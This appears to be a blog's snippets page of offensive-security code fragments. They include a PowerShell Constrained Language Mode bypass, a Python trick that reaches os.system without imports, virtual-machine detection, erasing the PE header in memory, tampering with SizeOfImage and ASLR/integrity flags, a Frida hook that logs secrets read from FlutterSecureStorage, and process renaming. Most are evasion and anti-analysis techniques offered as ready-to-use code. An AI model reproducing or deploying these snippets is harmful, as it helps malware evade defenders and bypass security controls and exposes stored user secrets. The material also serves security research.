snippets
short code fragments. recipes, tricks, one-shot scripts. the kind of thing that doesn't deserve a full post but you don't want to lose either.Bypass CLM
$CurrTemp = $env:temp
$CurrTmp = $env:tmp
$TEMPBypassPath = "C:\windows\temp"
$TMPBypassPath = "C:\windows\temp"
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value "$TEMPBypassPath"
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value "$TMPBypassPath"
Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "Powershell.exe"
sleep 5
#Set it back
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value $CurrTmp
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value $Cur...
Calling os.system Without import Statements
#!/usr/bin/env python3
# Note: this is clearly bad practice and should not be used in real projects.
# It is not confirmed that this will work in the future
for module in object.__subclasses__():
if "_wrap_close" in str(module):
for method in module.__init__.__globals__.values():
if "function system" in str(system := method):
system("id")
Check for Synthetic MSR
// Reserved MSR Address Space, meaning all future processors will not implement MSRs in this range.
//
// Goes up to 0x400000FF
//
#define SYNTHETIC_MSR_RANGE_START 0x40000000
BOOLEAN CheckForSyntheticMSR() {
__try {
__readmsr(SYNTHETIC_MSR_RANGE_START);
}
__except(EXCEPTION_EXECUTE_HANDLER) {
return FALSE;
}
// If by any chance __readmsr returns a value, and our handler does not gets executed, we are likely being virtualized
return TRUE;
}
Erase PE Header in Memory
#define PAGE_SIZE 0x1000
#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
#define STATUS_PROCEDURE_NOT_FOUND 0xC000007A
#define STATUS_INVALID_PAGE_PROTECTION 0xC0000045
#define STATUS_SECTION_PROTECTION 0xC000004E
#define STATUS_SUCCESS 0x00000000
typedef
NTSYSCALLAPI
NTSTATUS
(NTAPI* pNtProtectVirtualMemory) (
_In_ HANDLE ProcessHandle,
_Inout_ PVOID* BaseAddress,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG NewProtect,
_Out_ PULONG OldProtect
);
NTSTATUS EraseHeader() {
// Retrieve our module's base address
auto base = CONTAINING_RECORD(
NtCurrentPeb()->Ldr->InLoadOrderModuleList.Flink,
LDR_DATA_TABLE_ENTRY,
InLoadOrderLinks
);
// Retrieve ntdll's base address
auto ntdll = CONTAINING_RECORD(
NtCurrentPeb()->Ldr->InLoadOrderModuleList.Flink->Flink,
LDR_DATA_TABLE_ENTRY,
InLoadOrderLinks
);
// Check if NtProtectVirtualMemory actually exists
if (!GetProcAddress(reinterpret_cast<HMODULE>(ntdll), "NtProtectVirtualMemory")) {
SetLastError(ERROR_PROC_NOT_FOUND);
return STATUS_PROCEDURE_NOT_FOUND;
}
// Retrieve its address
static auto _vprotect = reinterpret_cast<
pNtProtectVirtualMemory > (
GetProcAddress(reinterpret_cast<HMODULE>(ntdll), "NtProtectVirtualMemory")
);
// Change the protection of the 1st page of our PE (likely our PE header in memory)
// to PAGE_READWRITE, so we can zero it out.
ULONG oldProtect = 0;
SIZE_T size = PAGE_SIZE;
auto status = _vprotect(
NtCurrentProcess(),
reinterpret_cast<PVOID*>(base),
&size,
PAGE_READWRITE,
&oldProtect
);
if(!NT_SUCCESS(status)) {
return status;
}
// Zero out the whole page
__try {
RtlSecureZeroMemory(
base,
PAGE_SIZE
);
}
// If somehow RtlSecureZeroMemory fails, restore protections
__except (EXCEPTION_EXECUTE_HANDLER) {
ULONG dummy;
_vprotect(
NtCurrentProcess(),
reinterpret_cast<PVOID*>(base),
&size,
oldProtect,
&dummy
);
return STATUS_ACCESS_VIOLATION;
}
// Restore protections anyway
status = _vprotect(
NtCurrentProcess(),
reinterpret_cast<PVOID*>(base),
&size,
oldProtect,
&oldProtect
);
return status;
}
Frida hook: dump FlutterSecureStorage reads
Java.perform(function () {
var flutterSecureStorage = null;
try {
flutterSecureStorage = Java.use("com.it_nomads.fluttersecurestorage.FlutterSecureStorage");
if (flutterSecureStorage) {
console.log("> FlutterSecureStorage found");
flutterSecureStorage.read.overload('java.lang.String').implementation = function (key) {
var data = this.read(key);
console.log("Reading Data | Key: " + key + " | Data: " + data);
return data;
};
flutterSecureStorage.write.overload('java.lang.String', 'java.lang.String').implementation = function (key, value) {
console.log("Writing Data | Key: " + key + " | Data: " + value);
return this.write(key, value);
};
}
} catch (err) {
console.log("[!] FlutterSecureStorage not found yet. Retrying...");
setTimeout(arguments.callee, 5000); // you can change the time here if you prefer
}
});
Increase PE's SizeOfImage field
void IncreaseSizeOfImage(PPEB peb) {
const auto ldr_data = peb->LoaderData;
const auto& [flink, blink] = ldr_data->InLoadOrderModuleList;
// Retrieve the record of our PE from NTDLL's POV
const auto pe = reinterpret_cast<peb::PLDR_DATA_TABLE_ENTRY>(flink->Flink);
// Get the PE's SizeOfImage field
auto pSize = &pe->SizeOfImage;
// Increase it by an arbitrary number
*pSize = static_cast<
ULONG > (
static_cast< INT_PTR > (pe->SizeOfImage + 0x10000000));
}
Increase PE's SizeOfImage field
bool TamperDllCharacteristics(DWORD_PTR moduleBase) {
// retrieve the module's NT header
const auto dos = reinterpret_cast<PIMAGE_DOS_HEADER>(moduleBase);
const auto nt = reinterpret_cast<PIMAGE_NT_HEADERS>(moduleBase + dos->e_lfanew);
// Access the DllCharacteristics and toggle the ASLR & Authenticode if set
return nt->OptionalHeader.DllCharacteristics & (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
? (nt->OptionalHeader.DllCharacteristics &= ~(IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE), true)
: false
;
}
Rename Process Name by Modifying cmdline in Linux
#!/usr/bin/env python3
import ctypes
from threading import get_ident
libc = ctypes.CDLL("libc.so.6")
libc.pthread_setname_np(
ctypes.c_ulong(get_ident()),
ctypes.c_char_p(b"process_name"))
no snippets match that filter.
© 2026 inferi
· credits
· cc by-sa 4.0